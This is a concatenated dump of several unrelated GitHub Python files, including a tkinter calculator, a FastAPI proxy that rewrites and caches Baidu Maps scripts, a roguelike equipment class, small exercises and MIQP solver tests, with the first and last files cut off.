seven():\n global v\n v+=\"7\"\n data.set(v)\ndef eight():\n global v\n v+=\"8\"\n data.set(v)\ndef nine():\n global v\n v+=\"9\"\n data.set(v)\ndef zero():\n global v\n v+=\"0\"\n data.set(v)\n\ndef plus():\n global a\n global v\n global o\n a=int(v)\n o=\"+\"\n v+=\"+\"\n data.set(v) \ndef minus():\n global a\n global v\n global o\n a=int(v)\n o=\"-\"\n v+=\"-\"\n data.set(v)\ndef multiply():\n global a\n global v\n global o\n a=int(v)\n o=\"*\"\n v+=\"*\"\n data.set(v)\ndef divide():\n global a\n global v\n global o\n a=int(v)\n o=\"/\"\n v+=\"/\"\n data.set(v)\ndef c():\n global a\n global v\n global o\n v=\"\"\n a=0\n o=\"\"\n data.set(v)\ndef result():\n global a\n global v\n global o\n t=v\n if o==\"+\":\n b=int((t.split(\"+\")[1]))\n s=a+b\n data.set(s)\n v=str(s)\n elif o==\"-\":\n b=int((t.split(\"-\")[1]))\n s=a-b\n data.set(s)\n v=str(s)\n elif o==\"*\":\n b=int((t.split(\"*\")[1]))\n s=a*b\n data.set(s)\n v=str(s)\n elif o==\"/\":\n b=int((t.split(\"/\")[1]))\n if b==0:\n messagebox.showerror(\"Error\",\"Division by '0' not allowed\")\n a=\"\"\n v=\"\"\n data.set(v)\n else:\n s=int(a/b)\n data.set(s)\n v=str(s)\n\n\nroot=tkinter.Tk()\nroot.geometry('300x400+900+100')\nroot.wm_iconbitmap('cal.ico')\nroot.title('Calculator')\ndata=StringVar()\nl=Label(\n root,\n text='label',\n anchor=SE,\n font=('verdana',20),\n textvariable=data)\nl.pack(expand=True,fill='both')\nbr1=Frame(root,bg='#000000')\nbr1.pack(expand=True,fill='both')\nbr2=Frame(root)\nbr2.pack(expand=True,fill='both')\nbr3=Frame(root)\nbr3.pack(expand=True,fill='both')\nbr4=Frame(root)\nbr4.pack(expand=True,fill='both')\nb1=Button(\n br1,\n text=\"1\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=one)\nb1.pack(side=LEFT,expand=True,fill ='both')\nb2=Button(\n br1,\n text=\"2\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=two)\nb2.pack(side=LEFT,expand=True,fill ='both')\nb3=Button(\n br1,\n text=\"3\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=three)\nb3.pack(side=LEFT,expand=True,fill ='both')\nb4=Button(\n br1,\n text=\"+\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=plus)\nb4.pack(side=LEFT,expand=True,fill ='both')\n\n\nb5=Button(\n br2,\n text=\"4\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,\n command=four)\nb5.pack(side=LEFT,expand=True,fill ='both')\nb6=Button(\n br2,\n text=\"5\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=five)\nb6.pack(side=LEFT,expand=True,fill ='both')\nb7=Button(\n br2,\n text=\"6\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=six)\nb7.pack(side=LEFT,expand=True,fill ='both')\nb8=Button(\n br2,\n text=\"-\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=minus)\nb8.pack(side=LEFT,expand=True,fill ='both')\n\nb9=Button(\n br3,\n text=\"7\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=seven)\nb9.pack(side=LEFT,expand=True,fill ='both')\nb10=Button(\n br3,\n text=\"8\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=eight)\nb10.pack(side=LEFT,expand=True,fill ='both')\nb11=Button(\n br3,\n text=\"9\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=nine)\nb11.pack(side=LEFT,expand=True,fill ='both')\nb12=Button(\n br3,\n text=\"*\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=multiply)\nb12.pack(side=LEFT,expand=True,fill ='both')\n\n\nb13=Button(\n br4,\n text=\"C\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=c)\nb13.pack(side=LEFT,expand=True,fill ='both')\nb14=Button(\n br4,\n text=\"0\",\n 
font=('verdana',20),\n relief=GROOVE,\n border=0,command=zero)\nb14.pack(side=LEFT,expand=True,fill ='both')\nb15=Button(\n br4,\n text=\"=\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=result)\nb15.pack(side=LEFT,expand=True,fill ='both')\nb16=Button(\n br4,\n text=\"/\",\n font=('verdana',20),\n relief=GROOVE,\n border=0,command=divide)\nb16.pack(side=LEFT,expand=True,fill ='both')\n\n\nroot.mainloop()","repo_name":"Hardik200404/Calculator-GUI-Application","sub_path":"Calculator.py","file_name":"Calculator.py","file_ext":"py","file_size_in_byte":4635,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"38168107321","text":"master_dic = {\n 'shards': 0,\n 'fragments': 0,\n 'motes': 0\n}\nflag = False\n\nwhile True:\n temporary_dic = {}\n data = input().split()\n keys = [element for element in data if (data.index(element) + 1) % 2 == 0]\n values = [int(element) for element in data if (data.index(element) + 1) % 2 != 0]\n\n a = 0\n for key in keys:\n if key.lower() in temporary_dic.keys():\n temporary_dic[key.lower()] += values[a]\n else:\n temporary_dic[key.lower()] = values[a]\n a += 1\n\n for key, value in temporary_dic.items():\n if key.lower() in master_dic:\n master_dic[key.lower()] += value\n if master_dic['shards'] >= 250:\n master_dic['shards'] -= 250\n print('Shadowmourne obtained!')\n flag = True\n break\n elif master_dic['fragments'] >= 250:\n master_dic['fragments'] -= 250\n print('Valanyr obtained!')\n flag = True\n break\n elif master_dic['motes'] >= 250:\n master_dic['motes'] -= 250\n print('Dragonwrath obtained!')\n flag = True\n break\n else:\n master_dic[key.lower()] = value\n if flag:\n break\nfor key, value in master_dic.items():\n print(f'{key}: {value}')\n","repo_name":"lubodonchev/SoftUni_Coursework","sub_path":"First_Project/SoftUni Python Fundamentals May 2023/Dictionaries Exercises/legendary_farming.py","file_name":"legendary_farming.py","file_ext":"py","file_size_in_byte":1363,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"8476175236","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\"\"\"\n@File : main.py\n@Time : 2023/09/16 00:21:58\n@Author : yxh \n@Version : 1.0\n@Contact : xianhe_yan@sina.com\n\"\"\"\n\nfrom fastapi.staticfiles import StaticFiles\nfrom loguru import logger\nimport hashlib\nimport os\nimport re\nimport requests\nimport urllib3\nimport logging\n\nfrom fastapi import FastAPI, Request, Request, Response\nfrom fastapi.middleware.cors import CORSMiddleware\nfrom modules.db_client import MyredisClient\nfrom public.metadata import Tags\n\nfrom public.system import Configs\nfrom public.utils import UtilsTools\n\n\n\n# # ## ssl\nurllib3.disable_warnings()\nlogging.captureWarnings(True)\n\ndescription = \"\"\"\"\"\"\n\n# ####################################################################################################\n# ##*******************************************************************************************#######\n# ##************************* os env *****************************#######\n# ##*******************************************************************************************#######\n# # ## 提供服务地址\nEXTERNAL_URL = os.environ.get(\"EXTERNAL_URL\", \"http://10.138.4.163:9095\")\n# # ## 提供服务地址\nHTTPS_TYPE = os.environ.get(\"HTTPS_TYPE\", \"https://\")\n# # ## http 百度源地址\nAPI_WEBGL = os.environ.get(\"API_WEBGL\")\n\n# # ## 百度 ak\nAPI_WEBGL_AK = os.environ.get(\"API_WEBGL_AK\", 
\"API_WEBGL_AK\")\n\n# ## 四级域名\n\n# ## 三级域名\nMAPOPEN_CDN_BCEBOS_COM = os.environ.get(\"MAPOPEN_CDN_BCEBOS_COM\", \"mapopen.cdn.bcebos.com\")\nAPI_MAP_BAIDU_COM = os.environ.get(\"API_MAP_BAIDU_COM\", \"api.map.baidu.com\")\n# ## 二级级域名\nHM_BAIDU_COM = os.environ.get(\"HM_BAIDU_COM\", \"hm.baidu.com\")\nMAPONLINE0_BDIMG_COM = os.environ.get(\"MAPONLINE0_BDIMG_COM\", \"maponline0.bdimg.com\")\nMAPONLINE1_BDIMG_COM = os.environ.get(\"MAPONLINE1_BDIMG_COM\", \"maponline1.bdimg.com\")\nMAPONLINE2_BDIMG_COM = os.environ.get(\"MAPONLINE2_BDIMG_COM\", \"maponline2.bdimg.com\")\nMAPONLINE3_BDIMG_COM = os.environ.get(\"MAPONLINE3_BDIMG_COM\", \"maponline3.bdimg.com\")\nWEBMAP0_BDIMG_COM = os.environ.get(\"WEBMAP0_BDIMG_COM\", \"webmap0.bdimg.com\")\nPCOR_BAIDU_COM = os.environ.get(\"PCOR_BAIDU_COM\", \"pcor.baidu.com\")\nMIAO_BAIDU_COM = os.environ.get(\"MIAO_BAIDU_COM\", \"miao.baidu.com\")\nDLSWBR_BAIDU_COM = os.environ.get(\"DLSWBR_BAIDU_COM\", \"dlswbr.baidu.com\")\nMAP_BAIDU_COM = os.environ.get(\"MAP_BAIDU_COM\", \"map.baidu.com\")\n# # ## http DMZ 区域代理\nif \"https\" in HTTPS_TYPE:\n # # ## https DMZ 区域代理\n NG_MAPOPEN_CDN_BCEBOS_COM = os.environ.get(\n \"NG_MAPOPEN_CDN_BCEBOS_COM\", \"10.138.4.198:11443/mapopen_cdn_bcebos_com\"\n )\n NG_HM_BAIDU_COM = os.environ.get(\n \"NG_HM_BAIDU_COM\", \"10.138.4.198:11443/hm_baidu_com\"\n )\n NG_API_MAP_BAIDU_COM = os.environ.get(\n \"NG_API_MAP_BAIDU_COM\", \"10.138.4.198:11443/api_map_baidu_com\"\n )\n NG_MAPONLINE0_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE0_BDIMG_COM\", \"10.138.4.198:11443/maponline0_bdimg_com\"\n )\n NG_MAPONLINE1_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE1_BDIMG_COM\", \"10.138.4.198:11443/maponline1_bdimg_com\"\n )\n NG_MAPONLINE2_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE2_BDIMG_COM\", \"10.138.4.198:11443/maponline2_bdimg_com\"\n )\n NG_MAPONLINE3_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE3_BDIMG_COM\", \"10.138.4.198:11443/maponline3_bdimg_com\"\n )\n NG_WEBMAP0_BDIMG_COM = os.environ.get(\n \"NG_WEBMAP0_BDIMG_COM\", \"10.138.4.198:11443/webmap0_bdimg_com\"\n )\n NG_PCOR_BAIDU_COM = os.environ.get(\n \"NG_PCOR_BAIDU_COM\", \"10.138.4.198:11443/pcor_baidu_com\"\n )\n NG_MIAO_BAIDU_COM = os.environ.get(\n \"NG_MIAO_BAIDU_COM\", \"10.138.4.198:11443/miao_baidu_com\"\n )\n NG_DLSWBR_BAIDU_COM = os.environ.get(\n \"NG_DLSWBR_BAIDU_COM\", \"10.138.4.198:11443/dlswbr_baidu_com\"\n )\n NG_MAP_BAIDU_COM = os.environ.get(\n \"NG_MAP_BAIDU_COM\", \"10.138.4.198:11443/map_baidu_com\"\n )\nelse:\n NG_MAPOPEN_CDN_BCEBOS_COM = os.environ.get(\n \"NG_MAPOPEN_CDN_BCEBOS_COM\", \"10.138.4.198:11080/mapopen_cdn_bcebos_com\"\n )\n NG_HM_BAIDU_COM = os.environ.get(\n \"NG_HM_BAIDU_COM\", \"10.138.4.198:11080/hm_baidu_com\"\n )\n NG_API_MAP_BAIDU_COM = os.environ.get(\n \"NG_API_MAP_BAIDU_COM\", \"10.138.4.198:11080/api_map_baidu_com\"\n )\n NG_MAPONLINE0_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE0_BDIMG_COM\", \"10.138.4.198:11080/maponline0_bdimg_com\"\n )\n NG_MAPONLINE1_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE1_BDIMG_COM\", \"10.138.4.198:11080/maponline1_bdimg_com\"\n )\n NG_MAPONLINE2_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE2_BDIMG_COM\", \"10.138.4.198:11080/maponline2_bdimg_com\"\n )\n NG_MAPONLINE3_BDIMG_COM = os.environ.get(\n \"NG_MAPONLINE3_BDIMG_COM\", \"10.138.4.198:11080/maponline3_bdimg_com\"\n )\n NG_WEBMAP0_BDIMG_COM = os.environ.get(\n \"NG_WEBMAP0_BDIMG_COM\", \"10.138.4.198:11080/webmap0_bdimg_com\"\n )\n NG_PCOR_BAIDU_COM = os.environ.get(\n \"NG_PCOR_BAIDU_COM\", \"10.138.4.198:11080/pcor_baidu_com\"\n )\n 
NG_MIAO_BAIDU_COM = os.environ.get(\n \"NG_MIAO_BAIDU_COM\", \"10.138.4.198:11080/miao_baidu_com\"\n )\n NG_DLSWBR_BAIDU_COM = os.environ.get(\n \"NG_DLSWBR_BAIDU_COM\", \"10.138.4.198:11080/dlswbr_baidu_com\"\n )\n NG_MAP_BAIDU_COM = os.environ.get(\n \"NG_MAP_BAIDU_COM\", \"10.138.4.198:11080/map_baidu_com\"\n )\n\nif API_WEBGL is not None:\n _webgl_ = API_WEBGL\nelse:\n _webgl_ = Configs._WEBGL_\n\n\n#####################################################################################################\n###*******************************************************************************************#######\n###************************* FastAPI init *****************************#######\n###*******************************************************************************************#######\ntry:\n tags_metadata = Tags.tags_metadata()\n app = FastAPI(\n title=\"jsapiAPI\",\n description=description,\n summary=\"\",\n openapi_url=\"/jsapiAPI.json\",\n version=\"v1.0.0\",\n openapi_tags=tags_metadata,\n )\n\n app.add_middleware(\n CORSMiddleware,\n allow_origins=[\"*\"],\n allow_credentials=True,\n allow_methods=[\"*\"],\n allow_headers=[\"*\"],\n )\n # 将静态文件目录配置为 static 文件夹\n app.mount(\"/static\", StaticFiles(directory=\"static\"), name=\"static\")\n logger.success(\"[success] running (Press CTRL+C to quit) \")\nexcept Exception as e:\n logger.error(\"[error] running %s\" % e)\n raise e\n\n\n \n# ####################################################################################################\n# ##*******************************************************************************************#######\n# ##************************* JSAPI init *****************************#######\n# ##*******************************************************************************************#######\n\nasync def send_http(_uuid, _requrl, _headers, payload={}):\n try:\n response = requests.request(\n \"GET\", _requrl, headers=_headers, data=payload, verify=False, timeout=10\n )\n # 设置响应编码为 UTF-8\n # response.encoding = 'UTF-8'\n # 获取响应的估计编码方式\n encoding = response.apparent_encoding\n # 设置响应编码为估计编码方式\n response.encoding = encoding\n except requests.exceptions.Timeout:\n msg = \"Internal#Server#Error TimeoutException [%s] \" % _requrl\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return msg\n except requests.exceptions.ConnectionError as e:\n msg = \"Internal#Server#Error Exception [%s] \" % _requrl\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return \"Internal#Server#Error Exception %s\" % e\n except requests.exceptions.HTTPError as e:\n logging.error((\"[%s] {%s}\" % (_uuid, msg)))\n return \"Internal#Server#Error Exception 0 %s\" % e\n if response.status_code == 200:\n return response.text\n else :\n return \"Internal#Server#Error Exception 0 %s\" % response.status_code\n# 清理key\ndef clear_redis_key(ak):\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._JSAPI_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETSCRIPT_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETBMAPCSS_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak))\n MyredisClient.delete_redis_data((\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak))\n\nasync def function_url(ak, srt):\n # # ## 源 js url\n _webgl_js = \"\"\n # # ## 源 css url\n _webgl_css = \"\"\n _key_new = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n _functon_webgl_new = \"\"\n # 正则表达式匹配模式 查找符合模式的URL\n pattern = 
re.compile(r'https?://[^\\s\"\\']+')\n urls = re.findall(pattern, srt)\n for url in urls:\n if \"getscript\" in url.lower():\n if \".baidu.com\" in _webgl_.lower() :\n _webgl_js = url\n else :\n _rsync_webgl_js = getscriot_new(url)\n _webgl_js_tmp = await _rsync_webgl_js\n _webgl_js = _webgl_js_tmp.replace(\"https://\", \"http://\")\n _functon_webgl_new = srt.replace(\n url, \"%s/v2lbsyun/getscript/%s\" % (EXTERNAL_URL, ak)\n )\n if \".css\" in url.lower():\n if \".baidu.com\" in _webgl_.lower() :\n _webgl_css = url\n else :\n _rsync_webgl_css = getscriot_new(url)\n _webgl_css_tmp = await _rsync_webgl_css\n _webgl_css = _webgl_css_tmp.replace(\"https://\", \"http://\")\n \n _functon_webgl_new = _functon_webgl_new.replace(\n url, \"%s/v2lbsyun/getbmapcss/%s\" % (EXTERNAL_URL, ak)\n )\n # ## 拼接后的 function 放到redis\n MyredisClient.pull_redis_data(_key_new, _functon_webgl_new)\n\n # ## js key\n _getscript_key = (\"%s%s\") % (Configs._GETSCRIPT_KEY, ak)\n _getscript_new_key = (\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak)\n # ## css key\n _getbmapcss_key = (\"%s%s\") % (Configs._GETBMAPCSS_KEY, ak)\n _getbmapcss_new_key = (\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak)\n\n _uuid = UtilsTools().getUuid1()\n # ## 获取源js\n _rsync_getscript = send_http(_uuid, _webgl_js, _headers={})\n _getscript = await _rsync_getscript\n if \"Internal#Server#Error\" in _getscript:\n logger.error((\"[%s] {%s}\" % (\"ER99999:请求互联网失败!\", _webgl_js)))\n else:\n logger.info(_getscript)\n # ## 获取源js 入库\n MyredisClient.pull_redis_data(_getscript_key, _getscript)\n # ## 替换后的 js\n _rsync_getscript_tmp = getscriot_new(_getscript)\n _getscript_tmp = await _rsync_getscript_tmp\n MyredisClient.pull_redis_data(_getscript_new_key, _getscript_tmp)\n # ## 获取源css 入库\n _rsync_getbmapcss = send_http(_uuid, _webgl_css, _headers={})\n _getbmapcss = await _rsync_getbmapcss\n if \"Internal#Server#Error\" in _getscript:\n logger.error((\"[%s] {%s}\" % (\"ER99999:请求互联网失败!\", _webgl_css)))\n else:\n logger.debug(_getbmapcss)\n # ## 获取源css 入库\n MyredisClient.pull_redis_data(_getbmapcss_key, _getbmapcss)\n # ## 替换后的 css\n\n _rsync_getbmapcss_tmp = getscriot_new(_getbmapcss)\n _getbmapcss_tmp = await _rsync_getbmapcss_tmp\n MyredisClient.pull_redis_data(_getbmapcss_new_key, _getbmapcss_tmp)\n return _functon_webgl_new\n\n\n# 替换js css\nasync def getscriot_new(srt):\n # ## 替换域名\n tmp_srt = (\n srt.replace(MAPOPEN_CDN_BCEBOS_COM, NG_MAPOPEN_CDN_BCEBOS_COM, -1)\n .replace(HM_BAIDU_COM, NG_HM_BAIDU_COM, -1)\n .replace(API_MAP_BAIDU_COM, NG_API_MAP_BAIDU_COM, -1)\n .replace(MAPONLINE0_BDIMG_COM, NG_MAPONLINE0_BDIMG_COM, -1)\n .replace(MAPONLINE1_BDIMG_COM, NG_MAPONLINE1_BDIMG_COM, -1)\n .replace(MAPONLINE2_BDIMG_COM, NG_MAPONLINE2_BDIMG_COM, -1)\n .replace(MAPONLINE3_BDIMG_COM, NG_MAPONLINE3_BDIMG_COM, -1)\n .replace(WEBMAP0_BDIMG_COM, NG_WEBMAP0_BDIMG_COM, -1)\n .replace(PCOR_BAIDU_COM, NG_PCOR_BAIDU_COM, -1)\n .replace(MIAO_BAIDU_COM, NG_MIAO_BAIDU_COM, -1)\n .replace(DLSWBR_BAIDU_COM, NG_DLSWBR_BAIDU_COM, -1)\n .replace(MAP_BAIDU_COM, NG_MAP_BAIDU_COM, -1)\n )\n logger.info(tmp_srt)\n return tmp_srt\n# 处理函数示例\n@app.get(\"/v1/ping\", tags=[\"ping\"])\nasync def ping_controllers(request: Request):\n # 查询redis数据\n return {\"message\": request.url, \"nu\": MyredisClient.dbsize_redis()}\n\n\n# ####################################################################################################\n\n# jsapi getscript getbmapcss os.environ.get('xx', '127.0.0.1')\n\n# https://api.map.baidu.com/api?v=1.0&type=webgl&ak=\n\n\n@app.get(\"/v2lbsyun/webgl/{ak}\", 
tags=[\"jsapi\"])\nasync def jsapi_controllers(ak, response: Response, request: Request):\n _uuid = UtilsTools().getUuid1()\n logger.debug((\"[%s] {%s}\" % (_uuid, ak)))\n # # ## 查询redis key 是否存在如果存在直接从 redis 中获取\n _key = (\"%s%s\") % (Configs._JSAPI_KEY, ak)\n _key_new = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key_new)\n\n if _redis_data is not None and _redis_data != \"\" and len(_redis_data) > 0:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n # ## 清理key ##\n clear_redis_key(ak)\n logger.info((\"[%s] {%s}\" % (_uuid, \"clear_redis_key\")))\n # ## 通过接口获取方法\n _requrl = (\"%s%s\") % (_webgl_, ak)\n logger.debug((\"[%s] {%s}\" % (_uuid, _requrl)))\n logger.info(\"[%s][%s][%s] \" % (_uuid, request.client.host, request.url))\n # ## 源方法\n _rsync_functon_webgl = send_http(_uuid, _requrl, _headers={})\n _functon_webgl = await _rsync_functon_webgl\n \n # ## 接口是否异常异常直接返回给前端\n if \"Internal#Server#Error\" in _functon_webgl:\n return _functon_webgl\n else:\n MyredisClient.pull_redis_data(_key, _functon_webgl)\n if (\n _functon_webgl is not None\n and _functon_webgl != \"\"\n and len(_functon_webgl) > 0\n ):\n _rsync_function_url=function_url(ak, _functon_webgl)\n _functon_webgl_new = await _rsync_function_url\n\n return Response(content=_functon_webgl_new, media_type=\"text/plain\")\n else:\n return {\"message\": \"ER88888:处理数据异常非标准数据!\", \"url\": _requrl}\n\n\n@app.get(\"/v2lbsyun/getscript/{ak}\", tags=[\"getscript\"])\nasync def getscript_controllers(ak, response: Response, request: Request):\n # 直接返回\n _key = (\"%s%s\") % (Configs._GETSCRIPT_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key)\n if _redis_data is not None:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n _key = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n MyredisClient.delete_redis_data(_key)\n return {\"message\": (\"%s%s\") % (_webgl_, ak)}\n\n\n@app.get(\"/v2lbsyun/getbmapcss/{ak}\", tags=[\"getbmapcss\"])\nasync def getbmapcss_controllers(ak, response: Response, request: Request):\n # 如果有直接返回\n _key = (\"%s%s\") % (Configs._GETBMAPCSS_NEW_KEY, ak)\n _redis_data = MyredisClient.get_redis_data(_key)\n if _redis_data is not None:\n return Response(content=_redis_data, media_type=\"text/plain\")\n else:\n _key = (\"%s%s\") % (Configs._JSAPI_NEW_KEY, ak)\n MyredisClient.delete_redis_data(_key)\n return {\"message\": (\"%s%s\") % (_webgl_, ak)}\n\n\n# 处理函数示例\n@app.get(\"/v2lbsyun/clear/{ak}\", tags=[\"clear\"])\nasync def clear_controllers(ak, sk, response: Response, request: Request):\n _uuid = UtilsTools().getUuid1()\n logger.info(\"[%s][%s][%s] \" % (_uuid, request.client.host, request.url))\n # 计算 32 小写\n hash_object2 = hashlib.md5(\n hashlib.md5(ak.encode()).hexdigest().encode()\n ).hexdigest()\n if sk in hash_object2:\n clear_redis_key(ak)\n logger.info(\"[%s][%s][%s]\" % (request.url, _uuid, request.client.host))\n return {\"message\": request.url}\n else:\n logger.info(\"[%s][%s][%s]\" % (request.url, _uuid, request.client.host))\n return {\"message\": \"认证失败!\"}\n","repo_name":"yanxianhe/v2lbsyun","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":16587,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"19519878687","text":"\"\"\"A component of entity. 
Holds the entities that are currently equipped.\"\"\"\n\nfrom equipment_slots import EquipmentSlots\n\nclass Equipment:\n    def __init__(self, main_hand=None, off_hand=None):\n        self.main_hand = main_hand\n        self.off_hand = off_hand\n\n    @property\n    def max_hp_bonus(self):\n        bonus = 0\n\n        if self.main_hand and self.main_hand.equippable:\n            bonus += self.main_hand.equippable.max_hp_bonus\n\n        if self.off_hand and self.off_hand.equippable:\n            bonus += self.off_hand.equippable.max_hp_bonus\n\n        return bonus\n\n    @property\n    def power_bonus(self):\n        bonus = 0\n\n        if self.main_hand and self.main_hand.equippable:\n            bonus += self.main_hand.equippable.power_bonus\n\n        if self.off_hand and self.off_hand.equippable:\n            bonus += self.off_hand.equippable.power_bonus\n\n        return bonus\n\n    @property\n    def defense_bonus(self):\n        bonus = 0\n\n        if self.main_hand and self.main_hand.equippable:\n            bonus += self.main_hand.equippable.defense_bonus\n\n        if self.off_hand and self.off_hand.equippable:\n            bonus += self.off_hand.equippable.defense_bonus\n\n        return bonus\n\n    def toggle_equip(self, equippable_entity):\n        results = []\n\n        slot = equippable_entity.equippable.slot\n\n        if slot == EquipmentSlots.MAIN_HAND:\n            if self.main_hand == equippable_entity: # If the item is already in the main hand dequip it.\n                self.main_hand = None\n                results.append({\"dequipped\": equippable_entity})\n            else:\n                if self.main_hand: # If a different item is in the main hand dequip it.\n                    results.append({\"dequipped\": self.main_hand})\n\n                self.main_hand = equippable_entity\n                results.append({\"equipped\": equippable_entity})\n        elif slot == EquipmentSlots.OFF_HAND:\n            if self.off_hand == equippable_entity:\n                self.off_hand = None\n                results.append({\"dequipped\": equippable_entity})\n            else:\n                if self.off_hand:\n                    results.append({\"dequipped\": self.off_hand})\n\n                self.off_hand = equippable_entity\n                results.append({\"equipped\": equippable_entity})\n\n        return results","repo_name":"dbane744/rougelike","sub_path":"components/equipment.py","file_name":"equipment.py","file_ext":"py","file_size_in_byte":2326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"36832772490","text":"# Write a function that will remove all vowels from a given string. 
\n# The function should return a string.\n# Example:\n# Input: 'Joel'\n# Output: 'Jl'\n\n# create a function\n# define vowels\n# have the function check the list of vowels and match against the string\n# only add letters back in to the string that don't match the vowels\n\ndef shortcut( s ):\n\n vowels = [\"a\",\"e\",\"i\",\"o\",\"u\"]\n answer = \"\"\n for letter in s:\n if letter.lower() not in vowels:\n answer += letter\n return answer\n\nprint(shortcut(\"JOel\"))","repo_name":"TheSincoder/whiteboard","sub_path":"remove_vowels.py","file_name":"remove_vowels.py","file_ext":"py","file_size_in_byte":540,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"52"} +{"seq_id":"14527478099","text":"import scipy.sparse as spa\nimport numpy as np\nimport mathprogbasepy as mpbpy\n\n\n# Unit Test\nimport unittest\nimport numpy.testing as nptest\n\n\nclass basic_miqp(unittest.TestCase):\n\n def setUp(self):\n # Reset random seed for repeatability\n np.random.seed(1)\n\n # Random Example\n n = 30\n m = 50\n p = 5 # Number of integer variables\n\n # Generate random Matrices\n Pt = spa.random(n, n, density=0.6)\n P = Pt.dot(Pt.T).tocsc()\n q = np.random.randn(n)\n A = spa.random(m, n, density=0.6).tocsc()\n u = 3 + np.random.randn(m)\n l = -3 + np.random.randn(m)\n\n # Generate random vector of indeces\n i_idx = np.random.choice(np.arange(0, n), p, replace=False)\n\n # Generate variable bounds \n i_l = -1*np.ones(p)\n i_u = 1*np.ones(p)\n\n self.p = mpbpy.QuadprogProblem(P, q, A, l, u, i_idx, i_l, i_u)\n\n def test_basic_MIQP(self):\n # Solve with GUROBI\n res_gurobi = self.p.solve(solver=mpbpy.GUROBI)\n\n # Solve with CPLEX\n res_cplex = self.p.solve(solver=mpbpy.CPLEX)\n\n # Solve with MOSEK\n res_mosek = self.p.solve(solver=mpbpy.MOSEK)\n\n # Assert solutions matching (GUROBI - CPLEX)\n nptest.assert_allclose(res_gurobi.obj_val,\n res_cplex.obj_val,\n rtol=1e-4, atol=1e-4)\n nptest.assert_allclose(res_gurobi.x,\n res_cplex.x,\n rtol=1e-4, atol=1e-4)\n\n # Assert solutions matching (GUROBI - MOSEK)\n nptest.assert_allclose(res_gurobi.obj_val,\n res_mosek.obj_val,\n rtol=1e-4, atol=1e-4)\n nptest.assert_allclose(res_gurobi.x,\n res_mosek.x,\n rtol=1e-4, atol=1e-4)\n","repo_name":"bstellato/mathprogbasepy","sub_path":"mathprogbasepy/unittests/basic_miqp.py","file_name":"basic_miqp.py","file_ext":"py","file_size_in_byte":1890,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"52"} +{"seq_id":"39575192426","text":"\nverb_tags=[\"VB\", \"VBP\", \"VBD\", \"VBZ\", \"VBN\", \"VBG\"]\n\nclass CausalLinks:\n\n def __init__(self, events, event_local_index, events2, entities, entity_local_index, sentence, lemmas, pos,\n event_scores, entity_scores):\n self.sentence= sentence\n self.tokens= self.sentence.split(' ')\n self.events = events\n self.events2 = {}\n #Fix that? 
Delete events[e] where e is in events2?\n for span in events2:\n event = events[span]\n del self.events[span]\n self.events2[span] = event\n self.triggers= self.detect_causal_triggers(lemmas, pos)\n self.bounds= self.set_bounds()\n self.event_index= event_local_index\n self.entities= entities\n self.entity_index= entity_local_index\n self.report_frames = ['Communication', 'Text_creation', 'Statement', 'Warning', 'Indicating', 'Cogitation']\n self.event_scores= event_scores\n self.entity_scores= entity_scores\n\n\n def format(self, keys):\n event_index=\"\"\n event_text=\"\"\n bestScore = -1.0\n for span in self.event_index.keys():\n if span in keys:\n index= self.event_index[span]\n if self.event_scores[index] > bestScore:\n bestScore = self.event_scores[index]\n event_index = index\n event_text = self.events[span]['trigger']\n return event_index, event_text\n\n def detect_causal_triggers(self, lemmas, pos):\n triggers=[]\n if len(self.events)<2:\n return []\n # Hard Triggers\n causal={'CauseEffect':['impact', 'affect', 'drive', 'lead', 'result', 'cause', 'so', 'hence', 'consequence'],\n 'EffectCause':['because', 'due', 'since', 'as']}\n ##Add constraint that preventive triggers must also be verbs???\n # What about correlation 